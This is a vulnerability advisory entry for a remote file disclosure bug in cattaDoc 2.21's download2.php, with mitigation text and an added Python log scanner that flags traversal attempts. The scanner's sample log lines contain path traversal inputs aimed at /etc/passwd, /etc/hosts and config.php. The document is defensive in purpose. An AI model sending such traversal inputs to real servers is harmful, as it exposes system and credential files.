vendor: cattaDoc
by: GolD_M = [Mahmood_ali]
N/A
CVSS
MEDIUM
Remote File Disclosure
CWE
Product Name: cattaDoc
Affected Version From: 2.21
Affected Version To: 2.21
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
cattaDoc 2.21 (download2.php fn1) Remote File Disclosure Vulnerability
cattaDoc version 2.21 is vulnerable to remote file disclosure through the 'download2.php' script. By manipulating the 'fn1' parameter in the URL, an attacker can traverse the directory structure and read sensitive files from the server, such as '/etc/passwd'.
Mitigation:
To mitigate this vulnerability, update to a patched version of cattaDoc or apply any available security patches. Additionally, implement access control measures to restrict unauthorized access to sensitive files.
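
A detection-side companion to the description and mitigation above, as an added example that is not part of the original advisory or of cattaDoc: it scans web-server access logs for 'download2.php' requests whose 'fn1' value normalises to an absolute path or contains '..' segments. The log format, the /cattadoc/ URL prefix and every sample line are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines; the /cattadoc/ prefix, clients and
# file names are assumptions, not values taken from the advisory.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /cattadoc/download2.php?fn1=report.pdf HTTP/1.1" 200 5120
192.0.2.44 - - [01/Jan/2007:10:00:05 +0000] "GET /cattadoc/download2.php?fn1=../../../../etc/passwd HTTP/1.1" 200 1432
192.0.2.44 - - [01/Jan/2007:10:00:09 +0000] "GET /cattadoc/download2.php?fn1=%252e%252e%252fconfig.php HTTP/1.1" 200 310
192.0.2.10 - - [01/Jan/2007:10:00:12 +0000] "GET /cattadoc/index.php?fn1=../x HTTP/1.1" 200 900
192.0.2.51 - - [01/Jan/2007:10:00:20 +0000] "GET /cattadoc/download2.php?fn1=/etc/hosts HTTP/1.1" 404 0
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so nested encoding is normalised before checks."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_suspicious(fn1):
    """True if fn1 is anything other than a plain relative file path."""
    path = fully_decode(fn1).replace("\\", "/")
    if "\x00" in path or path.startswith("/") or re.match(r"[A-Za-z]:", path):
        return True
    return ".." in path.split("/")  # whole '..' segments only, not 'a..b'

def find_traversal_attempts(log_text, script="download2.php", param="fn1"):
    """Return (client, normalised fn1 value, HTTP status) per flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if is_suspicious(value):
                hits.append((client, fully_decode(value), status))
    return hits

if __name__ == "__main__":
    for hit in find_traversal_attempts(SAMPLE_LOG):
        print(hit)
```

A flagged request that returned status 200 deserves priority in triage, since the response may have carried file contents.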